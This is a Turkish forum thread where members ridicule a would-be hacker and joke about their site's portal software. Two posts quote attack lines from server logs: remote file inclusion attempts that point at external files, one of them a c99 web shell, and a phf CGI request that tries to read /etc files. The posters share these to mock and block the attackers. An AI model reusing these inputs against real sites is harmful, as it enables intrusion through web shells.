Salağa Bak!

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    pesimistzombie
    pesimistzombie's avatar
    Erkek
    ©2007 Tahribat Group - Her Hakki Saklidir. buraya bu site asp ile kodlanmıştır ibaresi koymak lazım sanırım :D :D

:|
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Naps
    Naps's avatar
    Erkek
    abi zaten hack edeceği siteye insan ilk önce bakar orda koskocaman www.tahribat.com/index.asp yazıyor yani:)

Hayat Ölüme Giden Yolda Bir Düştür...
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    kimene
    kimene's avatar
    Erkek
    bunların içinde öyle birisi varki adamın sitesinin ziyaretci defterine resim linki yazıyor. sonrada hackledim siteyi diyor :) banada bulaştı ancak annesi ile iyi dost olduk sonradan :)
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Ayro
    Ayro's avatar
    Erkek

hea o salaklıklarını unuttuk misal z defterine binlerce kez hacked by bilmem ne yazarlar cp sürekli binlerce satır olur o hacked oldu :D alın bende tahribatı hackledim

hackledim ben yaptım...

5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    fenerist07
    fenerist07's avatar
    Erkek

yıllardır özel yapım siteyiz biz diye yiodunuz bizi

mkportal kullanıomusunuz işte cıktı ortaya

adminlerden özür ve acıklama beklioruz!

:D 

Amphetamine Logic.
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    PowerfuL
    PowerfuL's avatar
    Erkek

hocalar benim sitede bunun gibi bir çok salak salak ataklar oluyor. sonuç ip ban. :)

örnekler:

1. sayfa=http://zoemend elson.co.uk/site/shopimages/products/extras/freeman.txt
    2. readmore=http://m00.laughingllamas.com/fileupload/store/check.txt?
    3. sayfa=http://megaturks.by.ru/c99.txt (c99 sokmaya çalışan mal)

bunlar sadece 3-4 günlük loglardan seçtiklerim. daha bir sürü lamer işi kodlar deniyorlar denyolar..

7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    SSH
    SSH's avatar
    Erkek

portalı mkportal forumuda smf sandı herhalde :)
    smf teması nası ama hacker beyy :D

sırıtma la.
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    renegadealien
    renegadealien's avatar
    Üstün Hizmet Madalyası Savaş Madalyası Başarı Madalyası Üstün Hizmet Madalyası Developer Madalyası
    Erkek

Hatalı Http Bilgisi : 'GET /cgi-bin/phf...0a/bin/cat%20/e%20tc HTTP/1.1'

aha bi sazan daha...

cgi-bin denio...

10.05.2013 tarihli google arama sonucu : Aradığınız - "herşeyin hayırlısı rampanın bayırlısı" - ile ilgili hiçbir arama sonucu mevcut değil. Kendi özlü sözümdür, kaynak belirterek kullanınız.
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    yolbulucu
    yolbulucu's avatar
    Banlanmış Üye
    Homo
    bende güzel mkportal temaları var yollıyım adminlerede arada bir deişsinler temayı ne bu hep aynı tas aynı hamam

29.99cm, titanyum kaplamalı, çift damarlı, su ve yağ soğutmalı.
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    LordWarrior
    LordWarrior's avatar
    Erkek
    o gün de bi salak vardı , bizim bi heykır abi var tahribat ne , google a basar diodu..1 haftadır verdim adama tahribatın adresini , her gördüğümde de soruyom , hani index die  adam da dur daha açıklara bakıyo diyo.ben de dün artık dayanamadım "siz gidin mysite ye basın öle gelin" dedim..o kendini hacker sanan adamla da konuştum msn de adam bence isko dan beter yırtık amk.bence adamakıllı hacker kendini pek belli etmez..bu habire ben züperim , ben harikayım , ben fbi sitesine basarım diyo..allah bilir bu google da msn heykırlamak diye konu da aratıyodur :D:D allahım ne lamerlara kaldık yarebbim..

and olsun sana çocuk hesabını soracağız.and olsun gün gün direnecek, tırnaklarımızla kazıyacağız adını.senin o küçük bedeninle binler olacağız.o gün geldiğinde o katil sürüleri ezilecektir sosyalizmin kızıl bayrağının altında.ve sosyalizmi kurduğumuz gün seni haykıracağız. adın devrimdir! adın sosyalizmdir! (bu çocuğu görmek için bkz.profil resmim...)
Toplam Hit: 8255 Toplam Mesaj: 43